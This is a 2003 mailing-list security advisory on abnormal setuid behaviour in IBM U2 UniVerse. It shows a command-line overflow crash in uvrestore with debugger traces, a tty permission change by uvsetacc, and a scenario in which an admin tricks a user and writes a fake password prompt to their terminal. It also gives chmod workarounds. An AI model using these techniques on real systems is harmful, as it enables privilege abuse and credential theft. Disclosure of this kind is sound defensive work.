[VulnWatch] SRT2003-07-07-0913 - Abnormal suid behavior in several applications

From: KF (dotslash_at_snosoft.com)
Date: 07/16/03

  • Next message: KF: "[VulnWatch] SRT2003-07-08-1223 - IBM U2 UniVerse uvadm can take root via buffer overflows"
    Date: Tue, 15 Jul 2003 20:45:31 -0400
    To: bugtraq <bugtraq@securityfocus.com>
    
    
    

    Thanks to IBM for being so receptive with these issues.

    For those of you that have requested we revive the old "Snosoft"
    advisories we have begun placing our legacy advisories at
    http://www.secnetops.biz as time permits.
    -KF

    
    

    Secure Network Operations, Inc. http://www.secnetops.com
    Strategic Reconnaissance Team research@secnetops.com
    Team Lead Contact kf@secnetops.com

    Our Mission:
    ************************************************************************
    Secure Network Operations offers expertise in Networking, Intrusion
    Detection Systems (IDS), Software Security Validation, and
    Corporate/Private Network Security. Our mission is to facilitate a
    secure and reliable Internet and inter-enterprise communications
    infrastructure through the products and services we offer.

    Quick Summary:
    ************************************************************************
    Advisory Number : SRT2003-07-07-0913
    Product : IBM U2 UniVerse
    Version : Version <= 10.0.0.9 ?
    Vendor : http://ibm.com/software/data/u2/universe/
    Class : local
    Criticality : Low
    Operating System(s) : Only confirmed on Linux (other unix based?)

    High Level Explanation
    ************************************************************************
    High Level Description : Abnormal suid behavior in several applications
    What to do : chmod -s /usr/ibm/uv/bin/uvrestore
    chmod -s /usr/ibm/uv/bin/setacc

    Technical Details
    ************************************************************************
    Proof Of Concept Status : No PoC necessary
    Low Level Description :

    UniVerse is an extended relational database designed for embedding in
    vertical applications. Its nested relational data model results in
    intuitive data modeling and fewer resulting tables. UniVerse provides
    data access, storage and management capabilities across Microsoft®
    Windows® NT, Linux and UNIplatform.

    Several several binaries have odd behavior including core dumps and
    changing permissions on device files.

    The intent of the below gdb and strace dumps is only to show why we
    feel these issues are difficult to exploit on linux. We do not feel
    that we are disclosing Intellectual Property in any way. No anti
    debug routines are enforced by the below applications. The point is
    to show what calls are causing the problem. The result could vary on
    a different unix platform or processor.

    uvrestore suffers from a command line overflow:

    (gdb) r `perl -e 'print "A" x 6000'`
    Starting program: uvrestore `perl -e 'print "A" x 6000'`
    Program received signal SIGSEGV, Segmentation fault.
    0x0805e81a in basename ()
    (gdb) bt
    #0 0x0805e81a in basename ()
    #1 0x080619b3 in basename ()
    #2 0x42015574 in libc_start_main () from /lib/tls/libc.so.6
    (gdb) i r
    eax 0x41414141 1094795585

    ...
    [0805e6ec] strcmp("AAAAAAAAAAAAAAAAAAAAAAAAA"..., "-noindexfix") = 1
    [0805e771] strcmp("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., "-") = 1
    [0805e7f3] strcpy(0x083b7d00, "AAAAAAAAAAAAAAAAAAA"...) = 0x083b7d00
    [0805e815] strcpy(0x083b9100, "AAAAAAAAAAAAAAAAAAA"...) = 0x083b9100
    [0805e81a] --- SIGSEGV (Segmentation fault) ---

    uvsetacc does a chmod based on ttyname() results:

    [root@vegeta bin]# ltrace ./uvsetacc 2557
    ttyname(1) = "/dev/pts/1"
    chmod("/dev/pts/1", 04775) = 0

    [kf@vegeta kf]$ ls -al /dev/pts/1
    crw------- 1 kf tty 136, 1 Jul 7 21:40 /dev/pts/1
    [kf@vegeta kf]$ /usr/ibm/uv/bin/uvsetacc 2557
    [kf@vegeta kf]$ ls -al /dev/pts/1
    crwsrwxr-x 1 kf tty 136, 1 Jul 7 21:41 /dev/pts/1

    --- farfetched - disgruntled helpdesk worker attack scenario ---

    Helpdesk phone *ring*...
    uvadm-> hello
    boss-> my universe program xyz is acting weird

    uvadm finds boss's tty. *grin*
    kf pts/1 - 9:42pm 1:02 0.16s 0.16s /bin/bash

    [uvadm@vegeta uvadm]$ id
    uid=503(uvadm) gid=503(uvadm) groups=503(uvadm)
    [uvadm@vegeta uvadm]$ cat /dev/pts/1
    cat: /dev/pts/1: Permission denied

    uvadm-> hrmm try typing this and lets see what happens...
    "/usr/ibm/uv/bin/uvsetacc 2559"
    boss-> ok I typed it... now what?
    uvadm-> do you see the password prompt?

    [uvadm@vegeta uvadm]$ ls -al /dev/pts/1
    crwsrwxrwx 1 kf tty 136, 1 Jul 7 21:48 /dev/pts/1
    [uvadm@vegeta uvadm]$ echo Enter Your Universe Password: >> /dev/pts/1

    boss-> oh yeah hold on let me type the password in.
    ...

    In order to exploit the uvsetacc behvior, you must be logged in as user
    uvadm. The creation and use of the Unix user 'uvadm' is optional for
    UniVerse. It is not required for the successfull installation, configuration
    and administration of UniVerse. The intended use of uvadm is to allow a
    selected, specific non-root user to perform all aspects of UniVerse
    administration.

    Patch or Workaround : chmod -s /usr/ibm/uv/bin/uvrestore
    chmod -s /usr/ibm/uv/bin/setacc

    Vendor Status : The IBM U2 staff will have this issue resolved
    in a future release of IBM U2. Patches may also be supplied on a per
    client basis at IBM's disgression.

    Bugtraq URL : to be assigned

    ------------------------------------------------------------------------
    This advisory was released by Secure Network Operations,Inc. as a matter
    of notification to help administrators protect their networks against
    the described vulnerability. Exploit source code is no longer released
    in our advisories. Contact research@secnetops.com for information on how
    to obtain exploit information.


  • Next message: KF: "[VulnWatch] SRT2003-07-08-1223 - IBM U2 UniVerse uvadm can take root via buffer overflows"